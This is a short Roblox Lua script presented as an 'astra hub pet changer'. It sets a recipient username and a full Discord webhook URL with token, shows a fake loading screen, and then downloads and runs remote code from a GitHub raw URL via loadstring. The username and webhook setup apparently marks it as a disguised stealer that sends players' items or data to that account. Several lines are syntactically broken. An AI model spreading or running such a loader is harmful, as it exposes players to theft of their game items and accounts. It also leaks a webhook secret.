Username = "severarkvietn" 

WebHook ="https://discord.com/api/webhooks/1086933642556747836/sWbAMqGcpTykPmVgPaNp3R-fQkE26U4rk6Kwjf2jbpGEKHHLD7edFuiCaYNKhdsqwlVP"

loadingscreen = true -- set this to false and remove_G. stuff to use your own GUI 

_G.CustomScriptName= "astra hub pet changer" 

_G.Text1="Script Loaded..." 

_G. Text2= "Waiting for Script"

_G. Text3 = "Checking Scripts..." 

_G.Text4 "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com /Justanotherdme/petsimx22/main/petsimguiss.lua"))()
